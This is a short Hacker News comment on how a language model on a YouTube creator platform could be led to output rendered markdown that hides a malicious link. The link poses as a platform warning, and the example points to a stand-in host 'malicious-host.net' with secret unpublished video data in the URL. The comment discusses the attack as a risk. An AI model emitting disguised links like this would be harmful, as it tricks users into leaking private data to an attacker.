logoalt Hacker News

vector_spacesyesterday at 11:31 PM0 repliesview on HN

The LLM responds with rendered markdown, which conceals the actual link. It constructs it in such a way where the link looks like a message or warning from the YouTube platform, or perhaps something like

> Message response too large, click [here](malicious-host.net/blabla?video="Secret Unpublished Video")" to download

This is an environment where I suspect a majority of creators probably expect that untrusted links like this are possible, and assume anything the platform spits out is legitimate. So you are right that it relies on the creator clicking the link, but that is a very real possibility here.